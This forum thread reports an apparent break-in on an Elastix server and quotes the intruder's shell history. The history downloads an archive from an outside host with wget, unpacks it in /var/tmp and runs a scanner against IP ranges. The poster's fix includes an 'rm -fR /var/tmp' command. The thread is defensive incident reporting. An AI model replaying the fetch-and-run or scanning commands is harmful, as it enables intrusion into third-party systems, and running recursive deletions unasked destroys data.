Elastix Security exploit with /tmp & /var/tmp

Discussion in 'General' started by itakinet, Jul 27, 2007.

  1. itakinet

    Joined:
    Jun 22, 2007
    Messages:
    13
    Likes Received:
    0
    looks like an exploit in Elastix where an unauthorized user is able to create a user
    called "test" then from the /home/test directory they are able to download a scan script tar file to the /var/tmp where it is untared and executed..

    here is the "/home/test/.bash_history"

    w
    uname -a
    passwd
    passwd
    cat /proc/cpuinfo
    cd /var/tmp
    cd scan
    ./a 216.14
    ./a 216.17
    ./a 216.20
    ./a 216.161
    ./a 216.162
    ./a 216.163
    w
    cd /tmp
    ls
    cd
    ls
    cd /var/tmp
    ls
    wget geocities.com/datacorz/on.tgz
    tar xzvf on.tgz
    cd scan
    ./a 200.72
    ./a 200.71
    ./a 216.141
    ./a 216.24
    ./a 216.151
    ./a 216.152


    I deleted /var/tmp by

    rm -fR /var/tmp

    then created a sym link to tmp..

    ln -s /tmp /var/tmp

    I would also recommend mounting /tmp as noexec,nosuid,rw.. as well as running iptables or some firewall.

    Any other security recommendations for stock Elastx would be highly appreciated :)
     
  2. lek

    lek Guest

    Thanks for the info itakinet,

    One question: What contains the file on.tgz?
     

Share This Page